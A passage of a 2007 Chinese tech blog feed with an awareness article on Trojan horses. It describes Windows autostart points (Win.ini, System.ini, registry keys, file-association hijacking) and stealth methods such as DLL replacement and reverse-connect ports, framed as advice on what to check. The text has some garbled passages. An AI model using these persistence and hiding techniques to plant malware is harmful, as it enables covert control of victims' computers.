<p style="TEXT-INDENT: 2em">其实，上面的方法都是很常见的方法。还有很多方法，一时没办法整理出来，但对于新手来说足够了</p>
</font></font></font>
<img src ="http://www.cnitblog.com/yiye/aggbug/27313.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:02 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27313.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客知识之你真的知道特洛伊木马吗！</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27314.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:02:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27314.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27314.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27314.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27314.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27314.html</trackback:ping><description><![CDATA[<p><font id=Zoom>特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>是一种非常危险的恶性<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，它无休止的窃取用户的信息，从而给用户造成了巨大的损失。本期专题我们从特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>的原理、<a href="http://www.nohack.cn/" target=_blank>技术</a>以及防御与清除方面给大家进行全方位的介绍，让大家了解特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>，同时提高对特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>的防范意识&#8230;&#8230; </font></p>
<p><font id=Zoom>什么是特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>? </font></p>
<p><font id=Zoom>&#8220;特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>&#8221;（trojan horse）简称&#8220;<a href="http://www.nohack.cn/" target=_blank>木马</a>&#8221;，据说这个名称来源于希腊神话《<a href="http://www.nohack.cn/" target=_blank>木马</a>屠城记》。古希腊有大军围攻特洛伊城，久久无法攻下。于是有人献计制造一只高二丈的大<a href="http://www.nohack.cn/" target=_blank>木马</a>，假装作战马神，让士兵藏匿于巨大的<a href="http://www.nohack.cn/" target=_blank>木马</a>中，大部队假装撤退而将<a href="http://www.nohack.cn/" target=_blank>木马</a>摈弃于特洛伊城下。城中得知解围的消息后，遂将&#8220;<a href="http://www.nohack.cn/" target=_blank>木马</a>&#8221;作为奇异的战利品拖入城内，全城饮酒狂欢。到午夜时分，全城军民尽入梦乡，匿于<a href="http://www.nohack.cn/" target=_blank>木马</a>中的将士开秘门游绳而下，开启城门及四处纵火，城外伏兵涌入，部队里应外合，焚屠特洛伊城。后世称这只大<a href="http://www.nohack.cn/" target=_blank>木马</a>为&#8220;特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>&#8221;。如今<a href="http://www.nohack.cn/" target=_blank>黑客</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>借用其名，有&#8220;一经潜入，后患无穷&#8221;之意。 </font></p>
<p><font id=Zoom>完整的<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>一般由两个部份组成：一个是服务器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，一个是控制器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>。&#8220;中了<a href="http://www.nohack.cn/" target=_blank>木马</a>&#8221;就是指安装了<a href="http://www.nohack.cn/" target=_blank>木马</a>的服务器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，若你的<a href="http://www.nohack.cn/" target=_blank>电脑</a>被安装了服务器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，则拥有控制器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的人就可以通过<a href="http://www.nohack.cn/" target=_blank>网络</a>控制你的<a href="http://www.nohack.cn/" target=_blank>电脑</a>、为所欲为，这时你<a href="http://www.nohack.cn/" target=_blank>电脑</a>上的各种文件、<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，以及在你<a href="http://www.nohack.cn/" target=_blank>电脑</a>上使用的帐号、密码就无<a href="http://www.nohack.cn/" target=_blank>安全</a>可言了。 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>不能算是一种<a href="http://www.nohack.cn/" target=_blank>病毒</a>，但越来越多的新版的杀毒软件，已开始可以查杀一些<a href="http://www.nohack.cn/" target=_blank>木马</a>了，所以也有不少人称<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>为<a href="http://www.nohack.cn/" target=_blank>黑客</a><a href="http://www.nohack.cn/" target=_blank>病毒</a>。 </font></p>
<p><font id=Zoom>详解<a href="http://www.nohack.cn/" target=_blank>木马</a>原理 </font></p>
<p><font id=Zoom>介绍特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>的原理、特征以及中了<a href="http://www.nohack.cn/" target=_blank>木马</a>后系统出现的情况&#8230;&#8230; </font></p>
<p><font id=Zoom>特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>是如何启动的 </font></p>
<p><font id=Zoom>作为一个优秀的<a href="http://www.nohack.cn/" target=_blank>木马</a>，自启动功能是必不可少的，这样可以保证<a href="http://www.nohack.cn/" target=_blank>木马</a>不会因为你的一次关机操作而彻底失去作用。正因为该项<a href="http://www.nohack.cn/" target=_blank>技术</a>如此重要，所以，很多编程人员都在不停地研究和探索新的自启动<a href="http://www.nohack.cn/" target=_blank>技术</a>，并且时常有新的发现。一个典型的例子就是把<a href="http://www.nohack.cn/" target=_blank>木马</a>加入到用户经常执行的<a href="http://www.nohack.cn/code/" target=_blank>程序</a> (例如explorer.exe)中，用户执行该<a href="http://www.nohack.cn/code/" target=_blank>程序</a>时，则<a href="http://www.nohack.cn/" target=_blank>木马</a>自动发生作用。当然，更加普遍的方法是通过修改Windows系统文件和注册表达到目的，现经常用的方法主要有以下几种: </font></p>
<p><font id=Zoom>1.在Win.ini中启动 </font></p>
<p><font id=Zoom>　　在Win.ini的[windows]字段中有启动命令"load＝"和"run＝"，在一般情况下 "＝"后面是空白的，如果有后跟<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，比方说是这个样子： </font></p>
<p><font id=Zoom><br>run=c:/windows/file.exe <br>load=c:/windows/file.exe<br>&nbsp;</font></p>
<p><font id=Zoom>要小心了，这个file.exe很可能是<a href="http://www.nohack.cn/" target=_blank>木马</a>哦。 </font></p>
<p><font id=Zoom>2.在System.ini中启动 </font></p>
<p><font id=Zoom>System.ini位于Windows的安装目录下，其[boot]字段的shell=Explorer.exe是<a href="http://www.nohack.cn/" target=_blank>木马</a>喜欢的隐藏加载之所，<a href="http://www.nohack.cn/" target=_blank>木马</a>通常的做法是将该何变为这样:shell=Explorer.exefile.exe。注意这里的file.exe就是<a href="http://www.nohack.cn/" target=_blank>木马</a>服务端<a href="http://www.nohack.cn/code/" target=_blank>程序</a>! </font></p>
<p><font id=Zoom>另外，在System.中的[386Enh]字段，要注意检查在此段内的"driver＝路径/<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名"这里也有可能被<a href="http://www.nohack.cn/" target=_blank>木马</a>所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这3个字段，这些段也是起到加载驱动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的作用，但也是增添<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>的好场所，现在你该知道也要注意这里喽。 </font></p>
<p><font id=Zoom>3.利用注册表加载运行 </font></p>
<p><font id=Zoom>如下所示注册表位置都是<a href="http://www.nohack.cn/" target=_blank>木马</a>喜好的藏身加载之所，赶快检查一下，有什么<a href="http://www.nohack.cn/code/" target=_blank>程序</a>在其下。 </font></p>
<p><font id=Zoom>4.在Autoexec.bat和Config.sys中加载运行 </font></p>
<p><font id=Zoom>请大家注意，在C盘根目录下的这两个文件也可以启动<a href="http://www.nohack.cn/" target=_blank>木马</a>。但这种加载方式一般都需要控制端用户与服务端建立连接后，将己添加<a href="http://www.nohack.cn/" target=_blank>木马</a>启动命令的同名文件上传到服务端覆盖这两个文件才行，而且采用这种方式不是很隐蔽。容易被发现，所以在Autoexec.bat和Confings中加载<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>的并不多见，但也不能因此而掉以轻心。 </font></p>
<p><font id=Zoom>5.在Winstart.bat中启动 </font></p>
<p><font id=Zoom>Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件，也是一个能自动被Windows加载运行的文件。它多数情况下为应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>及Windows自动生成，在执行了Windows自动生成，在执行了Win.com并加截了多数驱动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>之后 </font></p>
<p><font id=Zoom>开始执行 (这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Witart.bat代替完成，因此<a href="http://www.nohack.cn/" target=_blank>木马</a>完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。 </font></p>
<p><font id=Zoom>6.启动组 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a>们如果隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场所，因此还是有<a href="http://www.nohack.cn/" target=_blank>木马</a>喜欢在这里驻留的。启动组对应的文件夹为C:/Windows/start menu/programs/startup,在注册表中的位置: HKEY_CURRENT_USER/Software/Microsoft/windows/CurrentVersion/Explorer/shellFolders Startup="c:/windows/start menu/programs/startup"。要注意经常检查启动组哦! </font></p>
<p><font id=Zoom>7.*.INI </font></p>
<p><font id=Zoom>即应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的启动配置文件，控制端利用这些文件能启动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的特点，将制作好的带有<a href="http://www.nohack.cn/" target=_blank>木马</a>启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动<a href="http://www.nohack.cn/" target=_blank>木马</a>的目的了。只启动一次的方式:在winint.ini.中(用于安装较多)。 </font></p>
<p><font id=Zoom>8.修改文件关联 </font></p>
<p><font id=Zoom>修改文件关联是<a href="http://www.nohack.cn/" target=_blank>木马</a>们常用手段 (主要是国产<a href="http://www.nohack.cn/" target=_blank>木马</a>，老外的<a href="http://www.nohack.cn/" target=_blank>木马</a>大都没有这个功能)，比方说正常情况下TXT文件的打开方式为Notepad.EXE文件，但一旦中了文件关联<a href="http://www.nohack.cn/" target=_blank>木马</a>，则txt文件打开方式就会被修改为用<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>打开，如著名的国产<a href="http://www.nohack.cn/" target=_blank>木马</a>冰河就是这样干的. "冰河"就是通过修改HKEY_CLASSES_ROOT/txtfile/whell/open/command下的键值，将&#8220;C: /WINDOWS/NOTEPAD.EXE本应用Notepad打开，如著名的国产HKEY一CLASSES一ROOT/txt闹 e/shell/open/commandT的键值，将 "C:/WINDOWS/NOTEPAD.EXE%l"改为 "C:/WINDOWS/SYSTEM/SYSEXPLR.EXE%l"，这样，一旦你双击一个TXT文件，原本应用Notepad打开该文件，现在却变成启动<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>了，好狠毒哦!请大家注意，不仅仅是TXT文件，其他诸如HTM、EXE、ZIP.COM等都是<a href="http://www.nohack.cn/" target=_blank>木马</a>的目标，要小心搂。 </font></p>
<p><font id=Zoom>对付这类<a href="http://www.nohack.cn/" target=_blank>木马</a>，只能经常检查HKEY_C/shell/open/command主键，查看其键值是否正常。 </font></p>
<p><font id=Zoom><br>9.捆绑文件 </font></p>
<p><font id=Zoom>实现这种触发条件首先要控制端和服务端已通过<a href="http://www.nohack.cn/" target=_blank>木马</a>建立连接，然后控制端用户用工具软件将<a href="http://www.nohack.cn/" target=_blank>木马</a>文件和某一应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>捆绑在一起，然后上传到服务端覆盖源文件，这样即使<a href="http://www.nohack.cn/" target=_blank>木马</a>被删除了，只要运行捆绑了<a href="http://www.nohack.cn/" target=_blank>木马</a>的应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，<a href="http://www.nohack.cn/" target=_blank>木马</a>义会安装上去。绑定到某一应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中，如绑定到系统文件，那么每一次Windows启动均会启动<a href="http://www.nohack.cn/" target=_blank>木马</a>。 </font></p>
<p><font id=Zoom>10.反弹端口型<a href="http://www.nohack.cn/" target=_blank>木马</a>的主动连接方式 </font></p>
<p><font id=Zoom>反弹端口型<a href="http://www.nohack.cn/" target=_blank>木马</a>我们已经在前面说过了，由于它与一般的<a href="http://www.nohack.cn/" target=_blank>木马</a>相反，其服务端 (被控制端)主动与客户端 (控制端)建立连接，并且监听端口一般开在80，所以如果没有合适的工具、丰富的经验真的很难防范。这类<a href="http://www.nohack.cn/" target=_blank>木马</a>的典型代表就是<a href="http://www.nohack.cn/" target=_blank>网络</a>神偷"。由于这类<a href="http://www.nohack.cn/" target=_blank>木马</a>仍然要在注册表中建立键值注册表的变化就不难查到它们。同时，最新的天网防火墙(如我们在第三点中所讲的那样)，因此只要留意也可在<a href="http://www.nohack.cn/" target=_blank>网络</a>神偷服务端进行主动连接时发现它。 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a>的隐藏方式 </font></p>
<p><font id=Zoom>1.在任务栏里隐藏 </font></p>
<p><font id=Zoom>这是最基本的隐藏方式。如果在windows的任务栏里出现一个莫名其妙的图标，傻子都会明白是怎么回事。要实现在任务栏中隐藏在编程时是很容易实现的。我们以VB为例。在VB中，只要把from的Visible属性设置为False,ShowInTaskBar设为False<a href="http://www.nohack.cn/code/" target=_blank>程序</a>就不会出现在任务栏里了。 </font></p>
<p><font id=Zoom>2.在任务管理器里隐藏 </font></p>
<p><font id=Zoom>查看正在运行的进程最简单的方法就是按下Ctrl+Alt+Del时出现的任务管理器。如果你按下Ctrl+Alt+Del后可以看见一个<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>在运行，那么这肯定不是什么好<a href="http://www.nohack.cn/" target=_blank>木马</a>。所以，<a href="http://www.nohack.cn/" target=_blank>木马</a>会千方百计地伪装自己，使自己不出现在任务管理器里。<a href="http://www.nohack.cn/" target=_blank>木马</a>发现把自己设为 "系统服务&#8220;就可以轻松地骗过去。 </font></p>
<p><font id=Zoom>因此，希望通过按Ctrl+Alt+Del发现<a href="http://www.nohack.cn/" target=_blank>木马</a>是不大现实的。 </font></p>
<p><font id=Zoom>3.端口 </font></p>
<p><font id=Zoom>一台机器有65536个端口，你会注意这么多端口么?而<a href="http://www.nohack.cn/" target=_blank>木马</a>就很注意你的端口。如果你稍微留意一下，不难发现，大多数<a href="http://www.nohack.cn/" target=_blank>木马</a>使用的端口在1024以上，而且呈越来越大的趋势;当然也有占用1024以下端口的<a href="http://www.nohack.cn/" target=_blank>木马</a>，但这些端口是常用端口，占用这些端口可能会造成系统不正常，这样的话，<a href="http://www.nohack.cn/" target=_blank>木马</a>就会很容易暴露。也许你知道一些<a href="http://www.nohack.cn/" target=_blank>木马</a>占用的端口，你或许会经常扫描这些端口，但现在的<a href="http://www.nohack.cn/" target=_blank>木马</a>都提供端口修改功能，你有时间扫描65536个端口么? </font></p>
<p><font id=Zoom>4.隐藏通讯 </font></p>
<p><font id=Zoom>隐藏通讯也是<a href="http://www.nohack.cn/" target=_blank>木马</a>经常采用的手段之一。任何<a href="http://www.nohack.cn/" target=_blank>木马</a>运行后都要和<a href="http://www.nohack.cn/" target=_blank>攻击</a>者进行通讯连接，或者通过即时连接，如<a href="http://www.nohack.cn/" target=_blank>攻击</a>者通过客户端直接接人被植人<a href="http://www.nohack.cn/" target=_blank>木马</a>的主机;或者通过间接通讯。如通过电子邮件的方式，<a href="http://www.nohack.cn/" target=_blank>木马</a>把侵入主机的敏感信息送给<a href="http://www.nohack.cn/" target=_blank>攻击</a>者。现在大部分<a href="http://www.nohack.cn/" target=_blank>木马</a>一般在占领主机后会在1024以上不易发现的高端口上驻留;有一些<a href="http://www.nohack.cn/" target=_blank>木马</a>会选择一些常用的端口，如80、23,有一种非常先进的<a href="http://www.nohack.cn/" target=_blank>木马</a>还可以做到在占领80HTTP端口后，收到正常的HTTP请求仍然把它交与Web服务器处理，只有收到一些特殊约定的数据包后，才调用<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>。 </font></p>
<p><font id=Zoom>5.隐藏隐加载方式 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a>加载的方式可以说千奇百怪，无奇不有。但殊途同归，都为了达到一个共同的目的，那就是使你运行<a href="http://www.nohack.cn/" target=_blank>木马</a>的服务端<a href="http://www.nohack.cn/code/" target=_blank>程序</a>。如果<a href="http://www.nohack.cn/" target=_blank>木马</a>不做任何伪装，就告诉你这是<a href="http://www.nohack.cn/" target=_blank>木马</a>，你会运行它才怪呢。而随着<a href="http://www.nohack.cn/" target=_blank>网站</a>互动化避程的不断进步，越来越多的东西可以成为<a href="http://www.nohack.cn/" target=_blank>木马</a>的传播介质，Java Script、VBScript、ActiveX.XLM....几乎WWW每一个新功能部会导致<a href="http://www.nohack.cn/" target=_blank>木马</a>的快速进化。 </font></p>
<p><font id=Zoom>6.最新隐身<a href="http://www.nohack.cn/" target=_blank>技术</a> </font></p>
<p><font id=Zoom>在Win9x时代，简单地注册为系统进程就可以从任务栏中消失，可是在Windows2000盛行的今天。这种方法遭到了惨败。注册为系统进程不仅仅能在任务栏中看到，而且可以直接在Services中直接控制停止。运行(太搞笑了，<a href="http://www.nohack.cn/" target=_blank>木马</a>被客户端控制)。使用隐藏窗体或控制台的方法也不能欺骗无所不见的Admlin大人(要知道，在NT下，Administrator是可以看见所有进程的)。在研究了其他软件的长处之后，<a href="http://www.nohack.cn/" target=_blank>木马</a>发现，Windows下的中文汉化软件采用的陷阱<a href="http://www.nohack.cn/" target=_blank>技术</a>非常适合<a href="http://www.nohack.cn/" target=_blank>木马</a>的使用。 </font></p>
<p><font id=Zoom>这是一种更新、更隐蔽的方法。通过修改虚拟设备驱动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>(VXD)或修改动态遵掇库 (DLL)来加载<a href="http://www.nohack.cn/" target=_blank>木马</a>。这种方法与一般方法不同，它基本上摆脱了原有的<a href="http://www.nohack.cn/" target=_blank>木马</a>模式---监听端口，而采用替代系统功能的方法(改写vxd或DLL文件)，<a href="http://www.nohack.cn/" target=_blank>木马</a>会将修改后的DLL替换系统已知的DLL，并对所有的函数调用进行过滤。对于常用的调用，使用函数转发器直接转发给被替换的系统DLL，对于一些相应的操作。实际上。这样的事先约定好的特种情况，DLL会执行一般只是使用DLL进行监听，一旦发现控制端的请求就激活自身，绑在一个进程上进行正常的<a href="http://www.nohack.cn/" target=_blank>木马</a>操作。这样做的好处是没有增加新的文件，不需要打开新的端口，没有新的进程，使用常规的方法监测不到它。在往常运行时，<a href="http://www.nohack.cn/" target=_blank>木马</a>几乎没有任何瘫状，且<a href="http://www.nohack.cn/" target=_blank>木马</a>的控制端向被控制端发出特定的信息后，隐藏的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>就立即开始运作。 </font></p>
<p><font id=Zoom>特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>具有的特性 </font></p>
<p><font id=Zoom>1.包含干正常<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中，当用户执行正常<a href="http://www.nohack.cn/code/" target=_blank>程序</a>时，启动自身，在用户难以察觉的情况下，完成一些危害用户的操作，具有隐蔽性。 </font></p>
<p><font id=Zoom>由于<a href="http://www.nohack.cn/" target=_blank>木马</a>所从事的是 "地下工作"，因此它必须隐藏起来，它会想尽一切办法不让你发现它。很多人对<a href="http://www.nohack.cn/" target=_blank>木马</a>和远程控制软件有点分不清，还是让我们举个例子来说吧。我们进行局域网间通讯的常用软件PCanywhere大家一定不陌生吧?我们都知道它是一款远程控制软件。PCanywhere比在服务器端运行时，客户端与服务器端连接成功后，客户端机上会出现很醒目的提示标志;而<a href="http://www.nohack.cn/" target=_blank>木马</a>类的软件的服务器端在运行的时候应用各种手段隐藏自己，不可能出现任何明显的标志。<a href="http://www.nohack.cn/" target=_blank>木马</a>开发者早就想到了可能暴露<a href="http://www.nohack.cn/" target=_blank>木马</a>踪迹的问题，把它们隐藏起来了。例如大家所熟悉<a href="http://www.nohack.cn/" target=_blank>木马</a>修改注册表和而文件以便机器在下一次启动后仍能载入<a href="http://www.nohack.cn/" target=_blank>木马</a>程式，它不是自己生成一个启动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，而是依附在其他<a href="http://www.nohack.cn/code/" target=_blank>程序</a>之中。有些<a href="http://www.nohack.cn/" target=_blank>木马</a>把服务器端和正常<a href="http://www.nohack.cn/code/" target=_blank>程序</a>绑定成一个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的软件，叫做exe-binder绑定<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，可以让人在使用绑定的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>时，<a href="http://www.nohack.cn/" target=_blank>木马</a>也入侵了系统。甚至有个别<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>能把它自身的exe文件和服务端的图片文件绑定，在你看图片的时候，<a href="http://www.nohack.cn/" target=_blank>木马</a>便侵人了你的系统。它的隐蔽性主要体现在以下两个方面: </font></p>
<p><font id=Zoom>(1)不产生图标 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a>虽然在你系统启动时会自动运行，但它不会在 "任务栏"中产生一个图标，这是容易理解的，不然的话，你看到任务栏中出现一个来历不明的图标，你不起疑心才怪呢! </font></p>
<p><font id=Zoom>(2)<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>自动在任务管理器中隐藏，并以"系统服务"的方式欺骗操作系统。 </font></p>
<p><font id=Zoom>2.具有自动运行性。 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a>为了控制服务端。它必须在系统启动时即跟随启动，所以它必须潜人在你的启动配置文件中，如win.ini、system.ini、winstart.bat以及启动组等文件之中。 </font></p>
<p><font id=Zoom>3.包含具有未公开并且可能产生危险后果的功能的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>。 </font></p>
<p><font id=Zoom>4.具备自动恢复功能。 </font></p>
<p><font id=Zoom>现在很多的<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>中的功能模块巴不再由单一的文件组成，而是具有多重备份，可以相互恢复。当你删除了其中的一个，以为万事大吉又运行了其他<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的时候，谁知它又悄然出现。像幽灵一样，防不胜防。 </font></p>
<p><font id=Zoom>5.能自动打开特别的端口。 </font></p>
<p><font id=Zoom><a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>潜人你的<a href="http://www.nohack.cn/" target=_blank>电脑</a>之中的目的主要不是为了破坏你的系统，而是为了获取你的系统中有用的信息，当你上网时能与远端客户进行通讯，这样<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>就会用服务器客户端的通讯手段把信息告诉<a href="http://www.nohack.cn/" target=_blank>黑客</a>们，以便<a href="http://www.nohack.cn/" target=_blank>黑客</a>们控制你的机器，或实施进一步的人侵企图。你知道你的<a href="http://www.nohack.cn/" target=_blank>电脑</a>有多少个端口?不知道吧?告诉你别吓着:根据TCP/IP协议，每台<a href="http://www.nohack.cn/" target=_blank>电脑</a>可以有256乘以256个端口，也即从0到65535号 "门"，但我们常用的只有少数几个，<a href="http://www.nohack.cn/" target=_blank>木马</a>经常利用我们不大用的这些端口进行连接，大开方便之 "门"。 </font></p>
<p><font id=Zoom>6、功能的特殊性。 </font></p>
<p><font id=Zoom>通常的<a href="http://www.nohack.cn/" target=_blank>木马</a>功能都是十分特殊的，除了普通的文件操作以外，还有些<a href="http://www.nohack.cn/" target=_blank>木马</a>具有搜索cache中的口令、设置口令、扫描目标机器人的IP地址、进行键盘记录、远程注册表的操作以及锁定鼠标等功能。上面所讲的远程控制软件当然不会有这些功能，毕竟远程控制软件是用来控制远程机器，方便自己操作而已，而不是用来黑对方的机器的。</font></p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27314.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:02 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27314.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>如何有效防范IP地址泄漏</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27311.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:01:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27311.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27311.html</wfw:comment><comments>http://www.cnitblog.com/yiy